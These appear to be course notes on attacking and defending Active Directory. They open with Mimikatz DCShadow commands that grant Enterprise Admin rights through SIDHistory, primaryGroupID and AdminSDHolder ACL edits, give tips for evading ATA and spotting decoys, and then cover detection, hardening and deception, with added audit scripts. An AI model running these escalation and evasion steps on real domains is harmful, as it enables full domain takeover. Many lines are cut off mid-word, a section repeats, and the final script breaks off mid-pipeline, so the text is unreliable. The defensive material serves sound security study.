- DCShadow can be used with minimal permissions by modifying the ACLs of:
  1. The domain object:
     * DS-Install-Replica (Add/Remove Replica in Domain)
     * DS-Replication-Manage-Topology (Manage Replication Topology)
     * DS-Replication-Synchronize (Replication Synchronization)
  2. The Sites object (and its children) in the Configuration container:
     * CreateChild and DeleteChild
  3. The object of the computer which is registered as a DC:
     * WriteProperty (not Write)
  4. The target object:
     * WriteProperty (not Write)

We can use Set-DCShadowPermissions from Nishang for setting the permissions.

For eg, to use DCShadow as user student1 to modify the root1user object from machine mcorp-student1 (this should be executed as DA):
Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

Now, the second Mimikatz instance (which runs as DA) is not required.
After executing the above with DA privs, do the same thing on instance 1.
Now, start instance 2 with SYSTEM privs of student1 and run DCShadow (no need of DA privs).

- Once we have the permissions sorted out, a lot of other interesting stuff can be done.
- 1.) Set the SIDHistory of a user account to the Enterprise Admins or Domain Admins group:
  lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-5-21-560323961-2032768757-2425134131-519

  Once these changes are pushed (i.e. lsadump::dcshadow /push), the student1 user runs with the privs of Enterprise Admins (SID -519).

  - To use the above without DA:
    Set-DCShadowPermissions -FakeDC mcorp-student1 -SAMAccountName root1user -Username student1 -Verbose

- 2.) Another interesting thing to do is that we can set the primaryGroupID of a user account to the Enterprise Admins or Domain Admins group:
  lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

  Note that, after the above command is used, the user shows up as a member of the Enterprise Admins group in some enumeration techniques like net group "Enterprise Admins" /domain

- 3.) It is possible to modify the ACLs of AdminSDHolder using DCShadow, as well.
  * Modify ntSecurityDescriptor for AdminSDHolder to add FullControl for a user:
    (New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=AdminSDHolder, CN=System, DC=moneycorp, DC=local")).psbase.ObjectSecurity.sddl
  * We just need to append a FullControl ACE from the above for SY/BA/DA with our user's SID at the end:
    lsadump::dcshadow /object:CN=AdminSDHolder, CN=System, DC=moneycorp, DC=local /attribute:ntSecurityDescriptor /value:<modified ACL>

  Steps:
  - Current ACL
  - Add an ACL with the SID of our user (the SID for our user can be obtained from Get-NetUser)
  - Modifying the ACL
  - Push the changes waiting on the RPC server (DCShadow):
    Mimikatz (Mimikatz.exe): lsadump::dcshadow /push

Shadowception:
It is possible to run DCShadow from DCShadow (a.k.a. Shadowception):

(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp, DC=local")).psbase.ObjectSecurity.sddl

We need to append our user's SID (UserSID) at the end of the following ACEs:
1. On the domain object:
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)

2. On the attacker computer object:
(A;;WP;;;UserSID)

3. On the target user object (so that it can modify its own attributes):
(A;;WP;;;UserSID)

4. On the Sites object in the Configuration container:
(A;CI;CCDC;;;UserSID)

• If we maintain access to the computer for which we modified the permissions with the user whose SID we added, we can modify the attributes of the specific user whose permissions we modified.
• Let's see how we can modify the properties of root13user from the mcorp-student13 machine as student13 using DCShadow.

Steps:
- Getting ACLs for the domain object
- Modifying the ACLs on the domain object (please note the use of the "stack" parameter in the command)
- Modifying the ACLs on the attacker computer object (again with the "stack" parameter)
- Modifying the ACLs on the target user object (again with the "stack" parameter)
- Modifying the ACLs on the Sites object (again with the "stack" parameter)
- Start the RPC server: lsadump::dcshadow
- The RPC server is waiting for a push from the DC, so let's push the modifications:
  Mimikatz (Mimikatz.exe): lsadump::dcshadow /push
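As an added defender-side example (not from the page or the tools it describes), an audit that walks a domain object's SDDL and reports any non-privileged SID holding one of the three replication control-access rights the Shadowception ACEs above grant; this is the check an ACL scanner should run after Set-DCShadowPermissions-style changes. The sample SDDL and the RID-1105 trustee are constructed, and the GUID-to-right-name pairing is taken from the AD schema rather than from the page.

```python
import re
from typing import List, Tuple

# Control-access-right GUIDs from the page's domain-object ACEs, paired with
# the right names the page lists under "minimal permissions" (schema fact).
REPLICATION_RIGHTS = {
    "9923a32a-3607-11d2-b9be-0000f87a36b2": "DS-Install-Replica",
    "1131f6ac-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Manage-Topology",
    "1131f6ab-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Synchronize",
}

# SDDL trustee aliases that legitimately hold replication rights on a domain
# object: SYSTEM, Builtin/Domain/Enterprise Admins, (Enterprise) DCs, RODCs.
TRUSTED_SIDS = {"SY", "BA", "DA", "EA", "ED", "DD", "RO", "S-1-5-9"}

# Constructed SDDL for a domain object (not from the page). The domain SID
# prefix is the page's example domain; RID 1105 is a made-up ordinary user.
SAMPLE_SDDL = (
    "O:DAG:DAD:PAI"
    "(A;;RPLCLORC;;;AU)"
    "(A;;RPWPCRCCDCLCLORCWOWDSW;;;DA)"
    "(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-560323961-2032768757-2425134131-1105)"
    "(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;S-1-5-21-560323961-2032768757-2425134131-1105)"
    "(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-560323961-2032768757-2425134131-1105)"
)

ACE_RE = re.compile(r"\(([^)]*)\)")


def dacl_aces(sddl: str) -> List[List[str]]:
    """Return the DACL's ACEs as lists of the six ';'-separated SDDL fields:
    type, flags, rights, object GUID, inherit GUID, trustee SID."""
    m = re.search(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    return [ace.split(";") for ace in ACE_RE.findall(m.group(1))]


def find_dcshadow_grants(sddl: str, trusted=TRUSTED_SIDS) -> List[Tuple[str, str]]:
    """(trustee, right) for every allow ACE that gives a non-trusted SID one of
    the replication control-access rights DCShadow needs on the domain object."""
    findings = []
    for fields in dacl_aces(sddl):
        if len(fields) != 6:
            continue  # not a plain ACE (e.g. conditional ACE); skip
        ace_type, _flags, rights, obj_guid, _inh, sid = fields
        if sid in trusted or rights.startswith("0x"):
            continue
        rights_set = set(re.findall(r"[A-Z]{2}", rights))
        if ace_type == "OA" and "CR" in rights_set and obj_guid.lower() in REPLICATION_RIGHTS:
            findings.append((sid, REPLICATION_RIGHTS[obj_guid.lower()]))
        elif ace_type == "A" and ("GA" in rights_set or "CR" in rights_set):
            # A non-object allow ACE carrying CR (or GenericAll) covers every
            # extended right, so it implicitly grants all three.
            for name in REPLICATION_RIGHTS.values():
                findings.append((sid, name))
    return findings


if __name__ == "__main__":
    for sid, right in find_dcshadow_grants(SAMPLE_SDDL):
        print(f"{sid} holds {right}")
```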
Detection and Defense
- Look for the flow of credentials and privileges in your environment
- Log events & most importantly, monitor logs
- Purple Teaming
- Work culture & architectural changes

Detection and Defense - Domain Admins
- Do not allow or limit login of DAs to any machine other than the DCs. If logins to some servers are necessary, do not allow other administrators to login to that machine.
- (Try to) Never run a service with DA. Many credential theft protections (like Credential Guard, the Protected Users group, etc.) which we'll discuss below are rendered useless in the case of a service account.
- Check out Temporary Group Membership! (Requires the Privileged Access Management feature to be enabled, which can't be turned off later)
Add-ADGroupMember -Identity 'Domain Admins' -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)

Detection and Defense - Golden Ticket
- Some important event IDs:
4624 - Account Logon
4634 - Account Logoff
4672 - Admin Logon
- PowerShell command to filter out logs:
Get-WinEvent -FilterHashtable @{Logname='Security' ; ID = 4672} -MaxEvents 1 | Format-List -Property *

Detection and Defense - Silver Ticket
- Some important event IDs:
4624 - Account Logon
4634 - Account Logoff
4672 - Admin Logon
- PowerShell command to filter out logs:
Get-WinEvent -FilterHashtable @{Logname='Security' ; ID = 4672} -MaxEvents 1 | Format-List -Property *

Detection and Defense - Skeleton Key
• Events - System Event ID 7045 - A service was installed in the system. (Type Kernel Mode driver)
• Events ("Audit privilege use" must be enabled)
  - Security Event ID 4673 - Sensitive Privilege Use
  - Event ID 4611 - A trusted logon process has been registered with the Local Security Authority
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}

• Not recommended (detects only stock mimidrv):
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}

Mitigations:
- Running lsass.exe as a protected process is really handy as it forces an attacker to load a kernel mode driver.
- Make sure that you test it thoroughly as many drivers and plugins may not load with the protection.
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\LSA\ -Name RunAsPPL -Value 1 -Verbose

Verify after reboot:
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}

Detection and Defense - DSRM
- Some important event IDs:
Event ID 4657 - Audit creation (or) change of HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior

Detection and Defense - Malicious SSP
- Some important event IDs:
Event ID 4657 - Audit creation (or) change of HKLM:\System\CurrentControlSet\Control\Lsa\Security Packages

Detection and Defense - Kerberoast
- Some important event IDs:
Security Event ID 4769 - A Kerberos ticket was requested
- Since 4769 is logged very frequently on a DC, we may like to filter results based on the following information from the logs:
  * Service name should not be krbtgt
  * Service name does not end with $ (to filter out machine accounts used for services)
  * Account name should not be machine@domain (to filter out requests from machines)
  * Failure code is '0x0' (to filter out failures, 0x0 is success)
  * Most importantly, ticket encryption type is 0x17

Mitigations:
  * Service account passwords should be hard to guess (greater than 25 characters)
  * Use managed service accounts (automatic change of passwords periodically and delegated SPN management)

PowerShell one-liner for quick testing:
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -notlike '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select -ExpandProperty message

Detection and Defense - Delegation
- Limit DA/Admin logins to specific servers
- Set "Account is sensitive and cannot be delegated" for privileged accounts

Detection and Defense - ACL attacks
• Events
Security Event ID 4662 (Audit Policy for object must be enabled) - An operation was performed on an object
Security Event ID 5136 (Audit Policy for object must be enabled) - A directory service object was modified
Security Event ID 4670 (Audit Policy for object must be enabled) - Permissions on an object were changed

• Useful tool: AD ACL Scanner - Create and compare reports of ACLs. https://github.com/canix1/ADACLScanner

Detection and Defense - Trust tickets
SID Filtering
- Avoids attacks that abuse the SID history attribute across forest trusts.
- Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secure by default (MS considers the forest, and not the domain, to be a security boundary).
- But, since SID filtering has the potential to break applications and user access, it is often disabled.

Selective Authentication
• In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated.
• Individual access to domains and servers in the trusting domain/forest should be given.
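As an added example (not the page's one-liner), the five Kerberoast filter conditions from the 4769 section above implemented by field name rather than by Message line index, which breaks across Windows versions, and run over constructed event messages; make_4769, the sample account names and the SPNs are assumptions for the demo.

```python
import re
from collections import Counter


def make_4769(account, service, etype, failure="0x0"):
    """Build a 4769 message body in the layout the Security log uses (constructed)."""
    return (
        "A Kerberos service ticket was requested.\n\n"
        "Account Information:\n"
        f"\tAccount Name:\t\t{account}\n"
        "\tAccount Domain:\t\tDOLLARCORP.MONEYCORP.LOCAL\n\n"
        "Service Information:\n"
        f"\tService Name:\t\t{service}\n\n"
        "Additional Information:\n"
        "\tTicket Options:\t\t0x40810000\n"
        f"\tTicket Encryption Type:\t{etype}\n"
        f"\tFailure Code:\t\t{failure}\n"
    )


# Constructed sample events; only the first two should survive the filter.
SAMPLE_EVENTS = [
    make_4769("student1@DOLLARCORP.MONEYCORP.LOCAL", "svcadmin", "0x17"),           # RC4, user SPN: keep
    make_4769("student1@DOLLARCORP.MONEYCORP.LOCAL", "websvc", "0x17"),             # second SPN: keep
    make_4769("student1@DOLLARCORP.MONEYCORP.LOCAL", "krbtgt", "0x17"),             # TGT, not a TGS: drop
    make_4769("DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL", "DCORP-ADMINSRV$", "0x12"),   # machine-to-machine: drop
    make_4769("student1@DOLLARCORP.MONEYCORP.LOCAL", "sqlsvc", "0x12"),             # AES ticket: drop
    make_4769("student1@DOLLARCORP.MONEYCORP.LOCAL", "svcadmin", "0x17", "0x1b"),   # failed request: drop
]

# "Field Name:<tabs>value" lines of the event message.
FIELD_RE = re.compile(r"^\s*([A-Za-z ]+):\s*(.*?)\s*$")


def parse_4769(message):
    """Map the message's 'Field Name: value' lines to a dict."""
    fields = {}
    for line in message.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_kerberoast_candidate(fields):
    """The page's five conditions, evaluated on named fields."""
    service = fields.get("Service Name", "")
    account = fields.get("Account Name", "")
    if service.lower() == "krbtgt":            # TGT requests, not service tickets
        return False
    if service.endswith("$"):                  # service hosted by a machine account
        return False
    if "$@" in account:                        # requested by a machine (machine$@domain)
        return False
    if fields.get("Failure Code") != "0x0":    # 0x0 is success
        return False
    return fields.get("Ticket Encryption Type", "").lower() == "0x17"  # RC4-HMAC


def kerberoast_candidates(messages):
    """Return (account, service) for every message passing all five checks."""
    hits = []
    for msg in messages:
        f = parse_4769(msg)
        if is_kerberoast_candidate(f):
            hits.append((f["Account Name"], f["Service Name"]))
    return hits


def requesters_by_spn_count(messages):
    """Distinct candidate SPNs per requesting account: one account pulling many
    RC4 service tickets in a short window is the usual Kerberoast shape."""
    spns = {}
    for account, service in kerberoast_candidates(messages):
        spns.setdefault(account, set()).add(service)
    return Counter({a: len(s) for a, s in spns.items()})


if __name__ == "__main__":
    for account, count in requesters_by_spn_count(SAMPLE_EVENTS).most_common():
        print(f"{account}: {count} RC4 service ticket(s) for user SPNs")
```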
Detection and Defense - ATA
- Microsoft ATA (Advanced Threat Analytics)
- Traffic destined for Domain Controller(s) is mirrored to ATA sensors and a user activity profile is built over time - use of computers, credentials, logon machines, etc.
- Collects events 4776 (The DC attempted to validate the credentials for an account) to detect credential replay attacks.
- Can detect behavior anomalies
- Useful for detecting:
  * Recon: Account enum, Netsession enum
  * Compromised credential attacks: Brute force, high privilege account/service account exposed in clear text, honey tokens, unusual protocol (NTLM Kerberos)
  * Credential / hash / ticket replay attacks

- One thing about ATA is that, say for eg. we run Invoke-UserHunter, ATA does not complain about the list of computers and group memberships we request/enumerate from the DC. It only complains that a session enumeration was performed on the Domain Controllers.
- So, what we can do is, first use Get-NetComputer, remove the DCs from that list and pass that new list as a parameter to Invoke-UserHunter:
Invoke-UserHunter -ComputerFile <listofmachines>

- Similarly, while doing PTH using Mimikatz, to avoid detection by ATA, we can use the AES keys along with the NTLM hash.
- The same applies to Golden tickets as well.
- ATA detects DCSync, but does not detect DCShadow.
- ATA does not detect Silver Tickets.

The key to bypassing ATA is to avoid talking to the DC as long as possible and make the traffic we generate as attacker appear normal.
LAPS ( Local Administrator Password Solution)
- Centralized storage of passwords in AD with periodic randomizing where read permissions are access controlled.
- When LAPS is used, Computer objects have two new attributes:
* ms-mcs-AdmPwd (stores the clear text password)
* ms-mcs-AdmPwdExpirationTime (controls the password change)
- Storage in clear text, transmission is encrypted.
- With careful enumeration, it is possible to retrieve which users can access the clear text password providing us a list of attra

Credential Guard
- Now called Windows Defender Credential Guard, it "uses virtualization based security to isolate secrets(say lsass), so that o
- Effective in stopping PTH and over-PTH attacks by restricting access to NTLM hashes and TGTs. As of Windows 10 1709, it is
- But, credentials for local accounts in SAM and service account credentials from LSA secrets are NOT protected by Credentia
- Credential Guard cannot be enabled on a domain controller as it breaks authentication there.
- Only available on the windows 10 enterprise edition and server 2016.
- It has been proved possible to replay service account credentials for lateral movement even if credential guard is enabled.

Device Guard
- Now called, Windows Defender Device Guard, it is a group of features "designed to harden a system against malware attack
- Three primary components :
* Configurable Code Integrity (CCI) - configure only trusted code to run
* Virtual secure mode protected code Integrity - Enforces CCI with Kernel mode (KMCI) and User mode (UMCI)
* Platform and UEFI Secure Boot - Ensures boot binaries and firmware integrity
- UMCI code integrity means to allow only known good code to run
- UMCI is something that interferes with most of the lateral movement attacks we have seen.
- While it depends on the deployment, many well known application whitelisting bypasses - signed binaries like csc.exe, MSB

Protected Users Group

* Protected Users is a group introduced in Server 2012 R2 for "better protection against credential theft" by not caching crede
A user added to this group:
— Cannot use CredSSP and WDigest - No more cleartext credentials caching.
— NTLM hash is not cached.
— Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.

* If the domain functional level is Server 2012 R2:

— No NTLM authentication.
— No DES or RC4 keys in Kerberos pre-auth.
— No delegation (constrained or unconstrained)
— No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable "Maximum lifetime for user ticket" and

Protected Users Group :


— Kerberos does not use DES or RC4 keys. No caching of clear text cred or long term keys.

* If the domain functional level is Server 2012 R2:

— No NTLM authentication.
— No DES or RC4 keys in Kerberos pre-auth.
— No delegation (constrained or unconstrained)
— No renewal of TGT beyond initial four hour lifetime - Hardcoded, unconfigurable "Maximum lifetime for user ticket" and

Protected Users Group :


- Needs all domain controllers to be atleast server 2008 or later (because AES keys)
- Not recommeded by Microsoft to add all DAs and EAs to this group without testing "the potential impact" of lockout.
- No cached logon (an issue for mobile users)
- Again, having computer and service accounts in this group is useless as their credentials will always be present on the host m

Privileged Administrative Workstations (PAWs)

* A hardened workstation for performing sensitive tasks like administration of domain controllers, cloud infrastructure, sensitive business functions etc.
* Can provide protection from phishing attacks, OS vulnerabilities, credential replay attacks.
* Admin Jump servers to be accessed only from a PAW, multiple strategies
— Separate privilege and hardware for administrative and normal tasks.
— Having a VM on a PAW for user tasks.

Active Directory Administrative Tier Model

* Composed of three levels only for administrative accounts:
— Tier 0 - Accounts, Groups and computers which have privileges across the enterprise like domain controllers, domain admins, enterprise admins.
— Tier 1 - Accounts, Groups and computers which have access to resources having significant amount of business value. A common example role is server administrators who maintain these operating systems with the ability to impact all enterprise services.
— Tier 2 - Administrator accounts which have administrative control of a significant amount of business value that is hosted on user workstations and devices. Examples include Help Desk and computer support administrators because they can impact the integrity of almost any user data.
* Control Restrictions - What admins control.
* Logon Restrictions - Where admins logon to.

ESAE (Enhanced Security Admin Environment) - THE RED FOREST

Dedicated administrative forest for managing critical assets like administrative users, groups and computers.
Since a forest is considered a security boundary rather than a domain, this model provides enhanced security controls.
The administrative forest is also called the Red Forest.
Administrative users in a production forest are used as standard non-privileged users in the administrative forest.
Selective Authentication to the Red Forest enables stricter security controls on logon of users from non-administrative forests.
Deception in AD - Decoy users

- Deception is a very effective technique in Active Directory defense.
- By using decoy domain objects, defenders can trick adversaries into following a particular attack path which increases chances of detection and increases their cost in terms of time.
- Traditionally, deception has been limited to leaving honey credentials on some boxes and checking their usage, but we can use it effectively during other phases of an attack.
- What to target? Adversary mindset of going for the lowest-hanging fruit and illusive superiority over defenders.
- We must provide the adversaries what they are looking for. For example, what adversaries look for in a user object:
* Password does not expire
* Trusted for delegation
* Users with SPN
* Password in Description
* Users who are members of high privilege groups
* Users with ACL rights over other users, groups or containers

Let's create some objects which can be used for deceiving adversaries. We can use Deploy-Deception for this: https://github.com/samratashok/Deploy-Deception
Note:
We should turn on Audit for Directory service access using Group Policy in order to use Deploy-Deception in our AD environment:
Windows Settings -> Security settings -> Advanced Audit policy configuration -> DS access - audit directory service access

Tool: Deploy-Deception
Command: Create-DecoyUser -UserFirstName user -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -Verbose
Description: Create a decoy user "usermanager" whose password never expires and turn on GenericRead for "Everyone"
Privileges: Domain Admin
Information Obtained / Comments: Please remember that an actual user is created on the DC where the above command is executed. Please remember to document this user's creation.

Now, after we have deployed the decoy user in the domain, if any kind of user enumeration is done on the domain, it leaves a 4662 code in the logs.
After running this command, there should be a 4662 in the log events. In case it is not being logged, in the server manager of the DC, go to Local group policy editor -> computer configuration -> Windows Settings -> Security settings -> Advanced Audit policy configuration -> DS access - audit directory service access -> configure -> success -> apply -> OK

- A GenericRead or ReadProperty triggers a 4662 in all cases even when the decoy user is not specifically enumerated.
For eg, the following commands trigger a 4662 for the decoy user called "usermanager":
- net user /domain
- Get-WmiObject -Class win32_UserAccount
- Get-ADUser -Filter * (ActiveDirectory Module)
- Get-NetUser (PowerView and other LDAP based tools)
- Find users, contacts and Groups - GUI

Hence, we need a way to trigger the log only when absolutely necessary. One way to do it is by triggering logs only when an uncommon property is enumerated.

- So, a better use case is to get a log entry only when an obscure/uncommon property is read.
Let's create a decoy user "usermanager-uncommon" whose password never expires and turn on auditing when x500uniqueIdentifier is read for "Everyone".

Tool: Deploy-Deception
Command: Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
Description: Alerting the logs for a 4662 only when all the properties are read, thus filtering out the noise of unwanted 4662 logs.
Privileges: Domain Admin
Information Obtained / Comments: Here, the GUID for x500uniqueIdentifier is d07da11f-8a3d-42b6-b0aa-76c962be719a

- For the previous decoy user, only LDAP based tools like PowerView, ADExplorer etc. trigger 4662.
- Tools which use LDAP or other offensive tools fetch all the information in a single attempt which makes them stand out.
- Since we are targeting very basic enumeration, which means there is a lot of noise, this is useful for filtering out some of the noise.
- Results are quite similar for user SPN (you may like to use a Kerberoastable password when targeting lateral movement):
Create-DecoyUser -UserFirstName user -UserLastName manager-spn -Password Pass@123 | Deploy-UserDeception -SPN 'dc/MSSQLSvc' -GUID f3a64788-5306-11d1-a9c5-0000f80367c1 -Verbose

This way, we can lead the adversary to kerberoast the user and crack the password. And, once they use the password for lateral movement, there will be a log entry.

Tool: Deploy-Deception
Command: Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
Description: Create a decoy user "usermanager-uncommon" and configure settings to log alerts only when a particular (or) all the properties are enumerated.
Privileges: Domain Admin
Information Obtained / Comments: Here, the GUID for x500uniqueIdentifier is d07da11f-8a3d-42b6-b0aa-76c962be719a

Deception in AD - Decoy computers

- Just like decoy users, Blue teamers can deploy decoy computer objects as well.
- It is better to use actual computers as decoys to avoid easy identification. Decoy computers should either be VMs or turned off after joining the domain unless they are used as honeypots.
- What computers are the attackers interested in?
* Older Operating Systems
* Interesting SPN
* Delegation Settings
* Membership of Privileged Groups

Tool: Deploy-Deception
Command: Create-DecoyComputer -ComputerName dcorp-web -Verbose | Deploy-ComputerDeception -PropertyFlag TrustedForDelegation -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
Description: Create a computer object for auditing whenever x500UniqueIdentifier is read
Privileges: Domain Admin

Tool: Deploy-Deception
Command: Deploy-ComputerDeception -DecoyComputerName comp1 -PropertyFlag TrustedForDelegation -Right ReadControl -Verbose
Description: Modify a computer object for auditing whenever its DACL is read.
Privileges: Domain Admin

We can also use this (with limited success) for DCShadow to mimic a Domain Controller.

Deception in AD - Decoy Groups

- Just like decoy users and decoy computers, Blue teamers can deploy decoy groups as well.
- Groups are interesting to attackers. We can have decoy groups with logging enabled for interesting activity like when Group Membership is read or Group members are read or an obscure property like x500UniqueIdentifier or the DACL is read.
- We can make a Group a member of other interesting groups.
- We can also create decoy users and make them members of the decoy group we are creating.

Tool: Deploy-Deception
Command: Create-DecoyGroup -GroupName "Forest Admins" -Verbose | Deploy-GroupDeception -AddMembers usermanager -AddToGroup dnsadmins -Right ReadControl -Verbose
Description: Auditing when the DecoyGroup DACL is read
Privileges: Domain Admin

Tool: Deploy-Deception
Command: Create-DecoyGroup -GroupName "Forest Admins" -Verbose | Deploy-GroupDeception -AddMembers usermanager -AddToGroup dnsadmins -GUID bc0ac240-79a9-11d0-9020-00c04fc2d4cf -Verbose
Description: Logs 4662 when the Group membership property set is read
Privileges: Domain Admin

Deception in AD - Lateral Movement - Users

- A couple of very interesting techniques which are also usable with the popular honey-credentials method. Make the decoy user a part of the domain admins or other privileged group or have rights like DCSync:
* Set the logon workstation to a non-existent machine.
* Deny logon to the user.
- In both the above cases, even with valid credentials, an adversary cannot abuse the credentials.
- With Audit Kerberos Authentication Service with Audit Failure enabled, a 4768 is logged every time someone tries to use that user.
- Such a decoy user will also be very interesting for enumeration!

Note:
To enable Audit Kerberos Authentication Service:
Configuration > Windows settings > security settings > advanced audit policy configuration > audit policies > account logon > Audit Kerberos Authentication Service > success

Tool: Deploy-Deception
Command: Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMembership -Protection DenyLogon -Verbose
Description: Create a decoy user "decda" who is a member of the domain admins group and is denied logon.
Privileges: Domain Admin

Tool: Deploy-Deception
Command: Deploy-UserDeception -DecoySamAccountName decda -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
Description: Enable directory access (4662) auditing on user "decda"

- Another interesting technique is to provide a "master" user FullControl over a "slave" user. This makes both the master and slave users interesting for an adversary looking at ACLs.
- Like the previous one, this technique is also useful in both the enumeration (specifically ACL enumeration) and lateral movement phases.
- For targeting lateral movement, we can make either slave or master or both privileged users, set SPN or any other flag we saw in Deploy-UserDeception.

Tool: Deploy-Deception
Command: Create-DecoyUser -UserFirstName master -UserLastName user -Password Pass@123
Create-DecoyUser -UserFirstName slave -UserLastName user -Password Pass@123 | Deploy-SlaveDeception -DecoySamAccountName masteruser -Verbose
Description: Create a slave user and set FullControl over it for a master user for targeting enumeration.
Privileges: Domain Admin

Tool: Deploy-Deception
Command: Deploy-UserDeception -DecoySamAccountName slaveuser -Principal masteruser -Right WriteDacl -Verbose
Description: To target lateral movement, as an example, we can set auditing whenever the master user changes the ACL of the slave user.
Privileges: Domain Admin

Tool: Deploy-Deception
Command: Deploy-UserDeception -DecoySamAccountName slaveuser -Principal honeyuser -Right ReadProperty -Verbose
Description: To target lateral movement, for any existing "honeyuser", set auditing whenever honeyuser is used to interact with the slaveuser.
Privileges: Domain Admin

Red Teaming Revenge - Identifying Deception

- There are multiple Enterprise solutions which do not use actual objects and can be spotted by looking at object properties like:
* objectSID (objectSID would be different from the SID of the domain)
* lastLogon, lastLogonTimestamp
* logonCount
* whenCreated
* badPwdCount
* Compare with known actual objects.
• Some Enterprise solutions also fill up ALL possible attributes for an object which can be easily spotted by comparing attributes with a real computer, say, the domain controller.
• In an assume breach scenario or from a foothold box, you can always get the actual DC by looking at the logonserver env variable. Use the DC or your own computer object's properties to compare properties of other computers. Compare SIDs of other users with RID 500 and other built-in accounts.
• For multiple solutions, using WMI for retrieving information lists only the actual objects and not the fake ones.

Red Teaming Revenge - Avoiding Deception

• Red Teams need to change their approach to avoid detection by deception.
• Please stop going for the lowest hanging fruit. Enterprise networks are a mess, but if something looks too good to be true, investigate carefully!
• Avoid automated enumeration tools unless you absolutely know what they are doing in the background.
• Avoid the urge to go for DA privs so that you can brag about it in the reports! Focus on the goal of your operation.
A tool which does a fantastic job at identifying fake domain admins is Invoke-HoneypotBuster.

Tool: Invoke-HoneypotBuster
Command: Invoke-HoneypotBuster -OpSec

Deploy-Deception addresses this to a limited extent by starting (and stopping) a process as the decoy DA when LogonWorkstation is set to one of the DCs. This fills up the "suspicious" properties.

Create-DecoyUser -UserFirstName dec -UserLastName da -Password Pass@123 | Deploy-PrivilegedUserDeception -Technique DomainAdminsMembership -Protection LogonWorkStation -LogonWorkStation dcorp-dc -CreateLogon -LogonCount 6 -Verbose
(Here, 6 is very tool specific to Invoke-HoneypotBuster)

Please be warned that the CreateLogon option in the above command will also create a profile for the decoy DA on the DC.
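As an added example (not part of the CRTP material or of Deploy-Deception), the following PowerShell narrows the 4662 stream on a DC down to reads of the x500uniqueIdentifier property on a named decoy object, which is the low-noise signal the "uncommon property" decoys above are built to produce. The decoy name and the constructed sample event are assumptions.

```powershell
# Added example (not part of the CRTP material or of Deploy-Deception): pull
# the low-noise 4662 events a decoy such as "usermanager-uncommon" is meant to
# produce. Run on a DC (or against forwarded Security logs) with log-read rights.
# Assumptions: the decoy's sAMAccountName and the constructed sample event.

# Property GUID the decoy was audited for (x500uniqueIdentifier, from above).
$X500UniqueIdentifierGuid = 'd07da11f-8a3d-42b6-b0aa-76c962be719a'

function ConvertFrom-4662Event {
    # Flatten the EventData of one 4662 event into an object we can filter on.
    param([Parameter(Mandatory)][xml]$Xml)
    $data = @{}
    foreach ($d in $Xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        TimeCreated = [datetime]$Xml.Event.System.TimeCreated.SystemTime
        Subject     = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
        LogonId     = $data.SubjectLogonId
        ObjectName  = $data.ObjectName      # "%{objectGUID}" of the AD object
        Properties  = $data.Properties      # access type + property GUID list
    }
}

function Get-DecoyReadEvents {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$DecoySamAccountName,
        [string]$PropertyGuid = $X500UniqueIdentifierGuid,
        [datetime]$Since = (Get-Date).AddDays(-1)
    )
    Import-Module ActiveDirectory
    # 4662 names the object by objectGUID, not by sAMAccountName, so resolve it.
    $objectGuid = (Get-ADUser -Identity $DecoySamAccountName).ObjectGUID.Guid
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-4662Event -Xml ([xml]$_.ToXml()) } |
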